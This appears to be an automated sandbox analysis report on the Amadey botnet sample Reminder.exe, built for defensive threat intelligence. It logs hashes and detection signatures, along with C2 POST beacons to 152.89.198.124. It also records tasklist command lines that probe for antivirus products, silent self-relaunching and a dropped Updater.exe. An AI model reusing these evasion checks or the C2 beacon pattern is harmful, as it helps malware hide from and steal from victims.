Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name: Reminder.exe
Analysis ID: 1540342
MD5: d743bb6502147d38addb430590bc7a98
SHA1: 16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
SHA256: ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95
Detection

Amadey
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: Reminder.exe ReversingLabs: Detection: 54%
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49724 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49719 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49729 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49721 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49723 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49717 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49727 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49731 -> 152.89.198.124:80
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: Reminder.exe Static PE information: Number of sections : 11 > 10
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal84.troj.spyw.evad.winEXE@60/7@0/11
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\coigned
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: Local\SM0:2864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: Reminder.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\Desktop\Reminder.exe File read: C:\Users\user\Desktop\Reminder.exe
Source: unknown Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
